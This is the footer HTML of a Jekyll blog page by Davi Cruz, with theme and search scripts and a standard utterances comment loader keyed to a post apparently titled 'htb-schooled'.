          <li><a href="/en-US">Also available in  <img class="emoji" title=":us:" alt=":us:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1fa-1f1f8.png" height="20" width="20"></a></li>
        
        
        
      
    
    <!-- end custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
  </ul>
</div>

<div class="page__footer-copyright">© 2023 Davi Cruz. Desenvolvido com <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a> &amp; <a href="https://github.com/kurtsson/jekyll-multiple-languages-plugin" rel="nofollow">Multiple Languages Plugin</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz-blog');
    // CUSTOM : Utterances post mapping due to Jekyll Multilanguage
    script.setAttribute('issue-term', 'htb-schooled');
    
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
